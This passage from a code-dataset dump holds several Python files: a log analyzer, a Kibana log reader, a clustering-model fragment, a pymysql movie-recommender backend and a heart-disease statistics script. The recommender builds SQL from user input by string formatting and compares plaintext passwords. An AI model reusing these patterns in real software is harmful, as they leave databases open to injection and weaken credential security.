{"api_name": "numpy.uint8", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 84, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "11909658955", "text": "from datetime import datetime\n\nfrom logs_parser import LogsParser\nfrom db_management import DataBaseManager\nfrom logger_settings import logger\n\n\nclass LogsAnalyzer:\n \"\"\"\n============================================================\nThe class is intended for analyzing data from an external resource.\n============================================================\n \"\"\"\n\n def __init__(self):\n self.logs_parser = LogsParser()\n self.logs_date = None\n self.db = None\n\n def _date_validation(self, input_date: str) -> None:\n \"\"\"Validates that the date has the correct format and raises an exception if it is invalid.\"\"\"\n # One could use 'datetime.strptime' here, but given the other requirements I decided to roll my own.\n if input_date.isdigit() and len(input_date) == 8:\n logger.debug('The date entered by the user was validated successfully.')\n self.logs_date = input_date\n else:\n logger.error(f'The user entered a date in an invalid format - {input_date}.')\n raise ValueError(f'A date in an invalid format was entered - {input_date}.')\n\n def _array_partition(self, data: list, low: int, high: int) -> int:\n \"\"\"Picks the middle element as the pivot (sorts left to right in ascending order).\"\"\"\n middle = data[(low + high) // 2]\n i = low - 1\n j = high + 1\n\n while True:\n i += 1\n\n while data[i]['created_at'] < middle['created_at']:\n i += 1\n\n j -= 1\n while data[j]['created_at'] > middle['created_at']:\n j -= 1\n\n if i >= j:\n return j\n\n data[i], data[j] = data[j], data[i]\n\n def _sort_logs(self, raw_data: dict) -> dict:\n \"\"\"Sorts the received logs by the 'created_at' field.\"\"\"\n all_logs = raw_data['logs']\n\n def _quick_sort(array: list, low: int, high: int):\n \"\"\"Helper recursive function for the sort.\"\"\"\n if low < high:\n middle_index = self._array_partition(array, low, high)\n _quick_sort(array, low, middle_index)\n _quick_sort(array, middle_index + 1, high)\n\n _quick_sort(all_logs, 0, len(all_logs) - 1)\n\n logger.info(f'The log for {self.logs_date} has been sorted.')\n return all_logs\n\n def _errors_in_log(self, raw_data: dict) -> bool:\n \"\"\"Checks the log for errors.\"\"\"\n if raw_data['error']:\n return True\n return False\n\n def make_analysis(self, input_date: str) -> str:\n \"\"\"Aggregator function that ties together the logic of the class.\"\"\"\n logger.info(f'Starting analysis of the log for {input_date}.')\n print(f'Starting analysis of the log for {input_date}.')\n\n self._date_validation(input_date)\n raw_data = self.logs_parser.get_data_from_logs_server(self.logs_date)\n\n if self._errors_in_log(raw_data):\n error_message = raw_data['error']\n logger.error(f'An error was found in the log: {error_message}.')\n return f'A date in an invalid format was entered - {self.logs_date}.'\n\n sorted_data = self._sort_logs(raw_data)\n\n if not self.db:\n self.db = DataBaseManager(self.logs_date)\n\n for row in sorted_data:\n creation_time = datetime.fromisoformat(row['created_at'])\n db_response = self.db.save_data_to_db(\n created_at=creation_time,\n first_name=row['first_name'],\n second_name=row['second_name'],\n message=row['message'],\n user_id=row['user_id']\n )\n logger.debug(db_response)\n\n logger.info(f'Parsing and saving of the log for {self.logs_date} completed successfully.')\n return f'Parsing and saving of the log for {self.logs_date} completed successfully.'\n\n def load_saved_logs(self, input_date: str):\n \"\"\"Loads the log for a specific date from the database.\"\"\"\n self._date_validation(input_date)\n if not self.db:\n self.db = DataBaseManager(self.logs_date)\n\n all_loaded_logs = self.db.get_all_data_from_db()\n return all_loaded_logs\n", "repo_name": "Interligo/script-to-get-logs", "sub_path": "logs_analyzer.py", "file_name": "logs_analyzer.py", "file_ext": "py", "file_size_in_byte": 5036, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logs_parser.LogsParser", "line_number": 16, "usage_type": "call"}, {"api_name": "logger_settings.logger.debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 24, "usage_type": "name"}, {"api_name": "logger_settings.logger.error", "line_number": 27, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 27, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 64, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 64, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 75, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "logger_settings.logger.error", "line_number": 83, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 83, "usage_type": "name"}, {"api_name": "db_management.DataBaseManager", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "name"}, {"api_name": "logger_settings.logger.debug", "line_number": 100, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 100, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 102, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 102, "usage_type": "name"}, {"api_name": "db_management.DataBaseManager", "line_number": 109, "usage_type": "call"}]}
+{"seq_id": "15344834600", "text": "\"\"\"\nLog-reading utilities, mainly used to extract returned strings from logs\n\"\"\"\n\nimport json\nimport re\n\n\nclass LogReader:\n \"\"\"\n Log reader: reads the log query result json obtained from the kibana console, saved into a .json file\n \"\"\"\n\n @staticmethod\n def read_log_from_json(log_path='log.json',\n filter_method=lambda x: x,\n reg_method=lambda x: x,\n single_convert_method=lambda x: x,\n total_convert_method=lambda x: x):\n \"\"\"\n The keys used here depend on kibana's log format; this does not apply if the log format differs\n :param total_convert_method: conversion method for the data as a whole\n :param single_convert_method: conversion method for a single record, e.g. json.loads()\n :param log_path: path of the log json file\n :param filter_method: log filtering method, used to filter logs that are inconvenient to filter in kibana\n :param reg_method: log extraction/matching method, used to cut out or match the needed data json in the log\n :return: list of data\n \"\"\"\n if log_path.__contains__('.json') is False:\n return []\n with open(log_path) as f:\n load_ = json.load(f)\n hits_ = load_['hits']['hits']\n # Filter the logs\n logs = list(filter(filter_method, hits_))\n log_sources = list(map(lambda x: x['_source']['log'], logs))\n # Match the log contents\n data = list(map(single_convert_method, map(reg_method, log_sources)))\n return total_convert_method(data)\n\n @staticmethod\n def filter_method_by_contains(content: str):\n \"\"\"\n Filter by containment; the result must contain the given string\n\n :param content: the substring that must be contained\n :return: a filter lambda\n \"\"\"\n return lambda x: x['_source']['log'].__contains__(content)\n\n @staticmethod\n def reg_method_by_split(splitter: str, index: int):\n \"\"\"\n Convert string content based on splitting\n\n :param splitter: the substring used for splitting\n :param index: index of the target content in the list after splitting\n :return: the converted string\n \"\"\"\n return lambda x: x.split(splitter)[index]\n\n @staticmethod\n def reg_method_by_regex(regex: str, index: int):\n \"\"\"\n Convert string content via regex matching\n\n :param regex: regular expression, e.g. 'body:(.*?),protocol' matches the content between body: and ,protocol\n :param index: index of the target substring in the regex match result list\n :return: the converted string\n \"\"\"\n return lambda x: re.findall(\n regex,\n # Strip whitespace characters\n x.replace('\\\\n', '').replace(' ', '').replace('\\\\t', ''), 0\n )[index]\n", "repo_name": "yromeMfOtuO/little-finger", "sub_path": "little_finger/log_reader/log_reader.py", "file_name": "log_reader.py", "file_ext": "py", "file_size_in_byte": 2814, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 71, "usage_type": "call"}]}
updated_cluster = (1 - eta) * self.clusters[cluster_idx] + eta * X[i] * assignments[i, cluster_idx].item()\n # updated_cluster = (1 - eta) * self.clusters[cluster_idx] + eta * X[i]\n self.clusters[cluster_idx] = updated_cluster\n\n def update_cluster_covs(self, X, cluster_idx, assignments):\n return None\n\n def update_cluster_pis(self, X, cluster_idx, assignments):\n return None\n\n def update_assign(self, X, how_to_assign=\"min_dist\"):\n \"\"\" Assign samples in `X` to clusters \"\"\"\n if how_to_assign == \"min_dist\":\n return self._update_assign_min_dist(X.detach().cpu().numpy())\n elif how_to_assign == \"forward_pass\":\n return self.get_model_resp(X)\n\n def _update_assign_min_dist(self, X):\n dis_mat = self._compute_dist(X)\n hard_assign = np.argmin(dis_mat, axis=1)\n return self._to_one_hot(torch.tensor(hard_assign))\n\n def _to_one_hot(self, hard_assignments):\n \"\"\"\n Takes LongTensor with index values of shape (*) and\n returns a tensor of shape (*, num_classes) that have zeros everywhere\n except where the index of last dimension matches the corresponding value\n of the input tensor, in which case it will be 1.\n \"\"\"\n return torch.nn.functional.one_hot(hard_assignments, num_classes=self.n_clusters)\n\n def _set_K(self, new_K):\n self.n_clusters = new_K\n self.count = 100 * np.ones((self.n_clusters)) # serve as learning rate, pseudo-counts\n\n def get_model_params(self):\n mu, covs, pi, K = self.model.get_clusters_centers(), self.model.get_clusters_covs(), self.model.get_clusters_pis(), self.n_clusters\n return mu, covs, pi, K\n\n def get_model_resp(self, codes):\n self.model.cluster_model.to(device=self.device)\n if self.args.regularization == \"cluster_loss\":\n # cluster assignment should have grad\n return self.model.cluster_model(codes)\n else:\n # cluster assignment shouldn't have grad\n with torch.no_grad():\n return self.model.cluster_model(codes)\n", "repo_name": "BGU-CS-VIL/DeepDPM", "sub_path": "src/clustering_models/clusternet.py", "file_name": "clusternet.py", "file_ext": "py", "file_size_in_byte": 5555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 724, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "joblib.Parallel", "line_number": 30, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 34, "usage_type": "call"}, {"api_name": "src.clustering_models.clusternet_modules.clusternet_trainer.ClusterNetTrainer", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn.functional.one_hot", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "1590291715", "text": "import 
pymysql\r\nimport predict as rc\r\nfrom geventwebsocket.websocket import WebSocket,WebSocketError\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nimport databaseInfo as db\r\nimport datetime\r\nimport re\r\nimport json\r\n#开启10个进程\r\nexecutor = ThreadPoolExecutor(10)\r\n#过滤\\n\r\npattern_for_types = re.compile(r'')\r\n#类型集合\r\ntypes_in_database = ['Animation',\\\r\n 'Children s', \\\r\n 'Comedy\\n',\\\r\n 'Adventure',\\\r\n 'Fantasy\\n',\\\r\n 'Comedy',\\\r\n 'Romance\\n',\\\r\n 'Drama\\n',\\\r\n 'Action',\\\r\n 'Crime',\\\r\n 'Thriller\\n',\\\r\n 'Children s\\n',\\\r\n 'Action\\n',\\\r\n 'Drama',\\\r\n 'Horror\\n',\\\r\n 'Sci-Fi\\n',\\\r\n 'Documentary\\n',\\\r\n 'War\\n',\\\r\n 'Adventure\\n',\\\r\n 'Musical',\\\r\n 'Mystery\\n',\\\r\n 'Sci-Fi',\\\r\n 'Horror',\\\r\n 'Musical\\n',\\\r\n 'Crime\\n',\\\r\n 'Mystery',\\\r\n 'Romance',\\\r\n 'Thriller',\\\r\n 'Film-Noir',\\\r\n 'Western\\n',\\\r\n 'Fantasy',\\\r\n 'War',\\\r\n 'Documentary',\\\r\n 'Animation\\n',\\\r\n 'Film-Noir\\n']\r\n\r\ntypes_modified_in_database = ['Animation',\\\r\n 'Children', \\\r\n 'Comedy',\\\r\n 'Adventure',\\\r\n 'Fantasy',\\\r\n 'Comedy',\\\r\n 'Romance',\\\r\n 'Drama',\\\r\n 'Action',\\\r\n 'Crime',\\\r\n 'Thriller',\\\r\n 'Children',\\\r\n 'Action',\\\r\n 'Drama',\\\r\n 'Horror',\\\r\n 'Sci-Fi',\\\r\n 'Documentary',\\\r\n 'War',\\\r\n 'Adventure',\\\r\n 'Musical',\\\r\n 'Mystery',\\\r\n 'Sci-Fi',\\\r\n 'Horror',\\\r\n 'Musical',\\\r\n 'Crime',\\\r\n 'Mystery',\\\r\n 'Romance',\\\r\n 'Thriller',\\\r\n 'Film-Noir',\\\r\n 'Western',\\\r\n 'Fantasy',\\\r\n 'War',\\\r\n 'Documentary',\\\r\n 'Animation',\\\r\n 'Film-Noir']\r\nreverse_types_in_database = {}\r\ntypes_in_database_to_types = {}\r\nfor index in range(len(types_in_database)):\r\n reverse_types_in_database[types_modified_in_database[index]] = types_in_database[index]\r\n types_in_database_to_types[types_in_database[index]] = types_modified_in_database[index]\r\n#服务函数\r\n#注册添加信息\r\n\r\ndef add_userInfo(userInfo):\r\n #加入数据库\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n #gender必须是‘男’或‘女’\r\n sql1 = \"Insert INTO User VALUES({},'{}',{},{},'{}','{}') \".format(\\\r\n userInfo[0],userInfo[1],userInfo[2],\\\r\n userInfo[3],userInfo[4],userInfo[5])\r\n sql2 = \"CREATE OR REPLACE VIEW rates AS SELECT MovieID, AVG(Rating) as rating FROM review GROUP BY MovieID\"\r\n try:\r\n print(sql1)\r\n cur.execute(sql1)\r\n print('test1')\r\n print(sql2)\r\n cur.execute(sql2)\r\n print('test2')\r\n for type in userInfo[6]:\r\n original_type = reverse_types_in_database[type]\r\n sql3 = \"CREATE OR REPLACE VIEW movie_{} as SELECT MovieID from movie_genre WHERE genre = '{}'\".format(type,original_type)\r\n cur.execute(sql3)\r\n print('test3')\r\n sql4 = \"SELECT MovieID from movie_{} natural left join rates ORDER BY rating DESC\".format(type)\r\n cur.execute(sql4)\r\n print('test4')\r\n data = cur.fetchone()\r\n date = str(datetime.datetime.now().strftime('%Y-%m-%d'))\r\n sql5 = \"INSERT INTO watch_history VALUES({},{},'{}')\".format(userInfo[0],data[0],date)\r\n print(sql5)\r\n cur.execute(sql5)\r\n print('test5')\r\n print('test6')\r\n except Exception:\r\n conn.rollback()\r\n print('添加数据失败')\r\n return 'failed'\r\n else:\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n return 'success'\r\n\r\n#验证用户是否存在/用户密码是否正确\r\ndef validate_userInfo(userInfo):\r\n #从数据库中按照userInfo[0]取出对应passwd\r\n conn = pymysql.connect(host=db.databaseAddress, 
user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n sql = \"SELECT password FROM User where UserID = {}\".format(userInfo[0])\r\n cur.execute(sql)\r\n data = cur.fetchone()\r\n print('data:',data)\r\n if data == None:\r\n #数据库中没这个人\r\n return 'Not exist'\r\n if userInfo[1] == data[0]:\r\n cur.close()\r\n conn.close()\r\n return 'success'\r\n else:\r\n cur.close()\r\n conn.close()\r\n return 'fail'\r\n\r\n\r\n#根据用户id获得片单\r\ndef get_list_from_dataset(socket,userName):\r\n userName = int(userName)\r\n movies = rc.recommend_your_favorite_movie(userName, top_k=60)\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n result = []\r\n sql1 = \"CREATE OR REPLACE VIEW rates AS SELECT MovieID, AVG(Rating) as rating FROM review GROUP BY MovieID\"\r\n #try:\r\n cur.execute(sql1)\r\n for movieID in movies:\r\n try:\r\n print(movieID)\r\n sql2 = \"SELECT Title, case when rating is null then 0 else rating END FROM movie natural left join rates WHERE movieID = {} \".format(movieID)\r\n cur.execute(sql2)\r\n data1 = cur.fetchone()\r\n print(data1)\r\n sql3 = \"SELECT case when Genre is null then 'Comedy\\n' else Genre END FROM movie natural join movie_genre natural left join rates WHERE movieID = {} \".format(movieID)\r\n cur.execute(sql3)\r\n data2 = cur.fetchall()\r\n print(data2)\r\n data2 = [i[0] for i in data2]\r\n if data1[0] != None and data1[1] != None and data2:\r\n #这里的data2改成,分隔的字符串!\r\n temp_str = types_in_database_to_types[data2[0]]\r\n for index in range(1,len(data2)):\r\n temp_str = temp_str + ',' + types_in_database_to_types[data2[index]]\r\n result.append({\"title\":data1[0],\"genre\":temp_str,\"rate\":float(data1[1])})\r\n except Exception:\r\n pass\r\n #except Exception:\r\n # conn.rollback()\r\n # print('添加数据失败')\r\n else:\r\n conn.commit()\r\n cur.close()\r\n try:\r\n conn.close()\r\n except Exception:\r\n pass\r\n try:\r\n if result:\r\n string = json.dumps(result)\r\n socket.send(string)\r\n else:\r\n socket.send('nothing')\r\n except WebSocketError:\r\n pass #占位置的空操作\r\n #executor.submit(add_to_history,userName,movies)\r\n add_to_history(userName,movies)\r\n\r\n\r\n '''\r\n #先根据userName查找出以往的历史\r\n if '有历史':\r\n #按照历史获得推荐\r\n return 'recommend content'\r\n else:\r\n #按照没有历史获得推荐\r\n return 'recommend content'\r\n '''\r\n\r\ndef add_to_history(userName,movies):\r\n conn = pymysql.connect(host=db.databaseAddress, user=db.databaseLoginName, password=db.databasePasswd, database=db.databaseName)\r\n cur = conn.cursor()\r\n date = str(datetime.datetime.now().strftime('%Y-%m-%d'))\r\n for movie in movies:\r\n sql = \"INSERT INTO watch_history VALUES({},{},'{}')\".format(userName,movie,date)\r\n cur.execute(sql)\r\n \r\n\r\n#已被废弃\r\n#def get_list_from_dataset_with_query(userName,query):\r\n'''\r\n#先根据userName查找出以往的历史\r\nif '有历史':\r\n #按照历史、query获得推荐\r\n #开一个线程,把这次的搜索加到历史中\r\n return 'recommend content'\r\nelse:\r\n #按照没有历史、只有query获得推��\r\n #开一个线程,把这次的搜索加到历史中\r\n return 'recommend content'\r\n'''", "repo_name": "GodXuxilie/DatabaseSystem", "sub_path": "supportFunction.py", "file_name": "supportFunction.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 10, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, 
{"api_name": "pymysql.connect", "line_number": 95, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 95, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 95, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 118, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 137, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 137, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 137, "usage_type": "attribute"}, {"api_name": "predict.recommend_your_favorite_movie", "line_number": 159, "usage_type": "call"}, {"api_name": "pymysql.connect", "line_number": 160, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 160, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 160, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "geventwebsocket.websocket.WebSocketError", "line_number": 202, "usage_type": "name"}, {"api_name": "pymysql.connect", "line_number": 219, "usage_type": "call"}, {"api_name": "databaseInfo.databaseAddress", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseLoginName", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databasePasswd", "line_number": 219, "usage_type": "attribute"}, {"api_name": "databaseInfo.databaseName", "line_number": 219, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 221, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 221, "usage_type": "attribute"}]} +{"seq_id": "8395870486", "text": "import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# TPC1: Análise de dados: doença cardíaca\n# Descarregue o ficheiro de dados: myheart.csv \n# Crie um programa em Python, conjunto de funções, que responda às seguintes questões:\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 1)\n# Crie uma função que lê a informação do ficheiro para um modelo, previamente pensado em memória;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\nclass Dados:\n\n def __init__(self, pessoas, max_idade, min_colesterol, max_colesterol, total_doenca, total_n_doenca, total):\n self.pessoas = pessoas # lista das pessoas, com os seus respetivos dados\n self.max_idade = max_idade\n self.min_colesterol = min_colesterol\n self.max_colesterol = max_colesterol\n self.total_doenca = total_doenca\n self.total_n_doenca = total_n_doenca\n self.total = total\n\nclass Pessoa:\n\n def __init__(self, 
idade, sexo, colesterol, temDoenca):\n        self.idade = idade\n        self.sexo = sexo\n        self.colesterol = colesterol\n        self.temDoenca = temDoenca\n\ndef read_myheart(): # Returns the list with each person's data\n    listaPessoas = [] # list with each person's data\n\n    min_idade = math.inf\n    max_idade = 0 # helper var used to find the upper bound of the ages\n    min_colesterol = math.inf\n    max_colesterol = 0 # find lower and upper bounds of the cholesterol values\n    total_doenca = 0\n    total_n_doenca = 0\n    total = 0\n\n    f = open(\"myheart.csv\",'r')\n    \n    # Skip the header line\n    linha1 = f.readline()\n\n    # Parse the contents\n    linhas = f.readlines()\n    for linha in linhas:\n        valores = linha.split('\\n')[0].split(',')\n\n        colesterol = int(valores[3])\n        # drop values that make no sense (cholesterol = 0)\n        if colesterol > 0: \n            idade = int(valores[0])\n            temDoenca = int(valores[5])\n            pessoa = Pessoa(idade, valores[1], colesterol, temDoenca)\n            listaPessoas.append(pessoa)\n            total += 1\n\n            # Bookkeeping checks\n            #age\n            if idade > max_idade: max_idade = idade\n            #cholesterol\n            if colesterol < min_colesterol: min_colesterol = colesterol\n            elif colesterol > max_colesterol: max_colesterol = colesterol\n            # disease\n            if temDoenca == 1: total_doenca += 1\n            else: total_n_doenca += 1\n\n    # Close the file\n    f.close()\n\n    dados = Dados(listaPessoas, max_idade, min_colesterol, max_colesterol, total_doenca, total_n_doenca, total)\n    return dados\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 2)\n# Think of a model to store a distribution;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\n# example: |  Has Disease  |  No Disease  |  Total\n    #  (...)\n    # Total    |       |       | \n\nclass DistribuicaoClasses: # similar to a histogram (continuous values)\n\n    def __init__(self, titulo, var):\n        self.titulo = titulo\n        self.var = var # the variable to relate to the disease\n        self.classes = {} # mimics a hash table (holding the continuous classes that get created)\n        self.total = 0\n        self.total_doenca = 0\n        self.total_n_doenca = 0\n\n    def adicionar_classe(self, l_inf, l_sup):\n        self.classes[(l_inf,l_sup)] = Classe(l_inf, l_sup)\n\n    def aumenta_doenca(self, l_inf, l_sup):\n        self.classes[(l_inf,l_sup)].aumenta_doenca()\n        self.total_doenca += 1\n        self.total += 1\n    \n    def aumenta_n_doenca(self, l_inf, l_sup):\n        self.classes[(l_inf,l_sup)].aumenta_n_doenca()\n        self.total_n_doenca += 1\n        self.total += 1\n\n    def dividir_valores(self):\n        keys = self.classes.keys()\n        for key in keys:\n            classe = self.classes[key]\n            classe.dividir_valores(self.total)\n            self.classes[key] = classe\n\nclass Classe: # for continuous classes (age - age groups)\n\n    def __init__(self, l_inf, l_sup):\n        self.l_inf = l_inf # LOWER bound\n        self.l_sup = l_sup # UPPER bound\n        # for now, the value that will go into the table\n        self.valor = [0,0,0]\n\n    def aumenta_doenca(self):\n        self.valor[0] += 1 # disease\n        self.valor[2] += 1 # total\n    \n    def aumenta_n_doenca(self):\n        self.valor[1] += 1 # no disease\n        self.valor[2] += 1 # total - rows\n\n    def dividir_valores(self, total):\n        for i in range(0,3):\n            self.valor[i] = self.valor[i] * 100 / total\n\nclass DistribuicaoSimples: # no classes (sex-disease)\n\n    def __init__(self, titulo, var):\n        self.titulo = titulo\n        self.var = var # the variable to relate to the disease\n        
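# self.tabela maps each key (e.g. \"Male\") to a [has_disease, no_disease, row_total] list; entries are created by adicionar_chave below.\n        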
self.tabela = {}\n\n    def adicionar_chave(self, chave):\n        self.tabela[chave] = [0,0,0] # disease, no disease, row total\n\n    def aumenta_doenca(self,chave):\n        (valor_d, valor_n_d, total_linha) = self.tabela[chave]\n        valor_d += 1\n        total_linha += 1\n        self.tabela[chave] = (valor_d, valor_n_d, total_linha)\n    \n    def aumenta_n_doenca(self,chave):\n        (valor_d, valor_n_d, total_linha) = self.tabela[chave]\n        valor_n_d += 1\n        total_linha += 1\n        self.tabela[chave] = (valor_d, valor_n_d, total_linha)\n\n    def dividir_valores(self, total):\n        keys = self.tabela.keys()\n        for key in keys:\n            (v1, v2, v3) = self.tabela[key]\n            self.tabela[key] = (v1 * 100 / total, v2 * 100 / total, v3 * 100 / total)\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 3)\n# Write a function that computes the distribution of the disease by sex;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_sexo(dados):\n    dist = DistribuicaoSimples(\"-| Distribution of the disease by sex (as a percentage, %) |-\",\"Sex\")\n    dist.adicionar_chave(\"Male\")\n    dist.adicionar_chave(\"Female\")\n\n    pessoas = dados.pessoas\n    for pessoa in pessoas:\n        if pessoa.sexo == \"M\":\n            if pessoa.temDoenca == 1:\n                dist.aumenta_doenca(\"Male\")\n            else:\n                dist.aumenta_n_doenca(\"Male\")\n        else:\n            if pessoa.temDoenca == 1:\n                dist.aumenta_doenca(\"Female\")\n            else:\n                dist.aumenta_n_doenca(\"Female\")\n    \n    dist.dividir_valores(dados.total)\n\n    return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 4)\n# Write a function that computes the distribution of the disease by age group. Consider the following groups: [30-34], [35-39], [40-44], ...\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_etario(dados):\n    # As requested in the assignment, only ages 30 and over are accepted\n    lim_inf = 30 # step = 5\n    max_idade = dados.max_idade\n\n    dist = DistribuicaoClasses(\"-| Distribution of the disease by age group (as a percentage, %) |-\", \"Age\")\n    \n    # Create the classes (without filling in their values yet)\n    while lim_inf <= max_idade :\n        dist.adicionar_classe(lim_inf, lim_inf+4)\n        #print(lim_inf)\n        lim_inf += 5\n    \n    pessoas = dados.pessoas\n    for pessoa in pessoas:\n        idade = pessoa.idade\n        if idade >= 30: # As requested in the assignment, only ages 30 and over are accepted\n            ultimo_digito = idade % 5\n            lim_inf = idade - ultimo_digito\n\n            if pessoa.temDoenca == 1: \n                dist.aumenta_doenca(lim_inf, lim_inf + 4)\n            else:\n                dist.aumenta_n_doenca(lim_inf, lim_inf + 4)\n    \n    # Compute the percentage for each class\n    dist.dividir_valores()\n\n    return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 5)\n# Write a function that computes the distribution of the disease by cholesterol level. 
\n# Take each level to be an interval of 10 units; start at the lower bound and create as many levels as needed to cover the upper bound;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef dist_doenca_colesterol(dados):\n    lim_inf = dados.min_colesterol - (dados.min_colesterol % 10) # step = 10\n    max_colesterol = dados.max_colesterol\n\n    dist = DistribuicaoClasses(\"-| Distribution of the disease by cholesterol level (as a percentage, %) |-\", \"Cholesterol\")\n    \n    # Create the classes (without filling in their values yet)\n    while lim_inf <= max_colesterol :\n        dist.adicionar_classe(lim_inf, lim_inf+9)\n        #print(lim_inf)\n        lim_inf += 10\n    \n    pessoas = dados.pessoas\n    for pessoa in pessoas:\n        colesterol = pessoa.colesterol\n        ultimo_digito = colesterol % 10\n        lim_inf = colesterol - ultimo_digito\n        \n        if pessoa.temDoenca == 1: \n            dist.aumenta_doenca(lim_inf, lim_inf+9)\n        else:\n            dist.aumenta_n_doenca(lim_inf, lim_inf+9)\n    \n    dist.dividir_valores()\n\n    return dist\n\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n# 6)\n# Write a function that prints a distribution as a table;\n#------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------\n\ndef imprimir_distribuicao(dist, dados): # as a table\n    print(\"\")\n    print(dist.titulo)\n    print(\"\")\n    print(dist.var + \" | Has Disease | No Disease | Total\")\n    print(\"----------------------------------------------\")\n\n    if isinstance(dist, 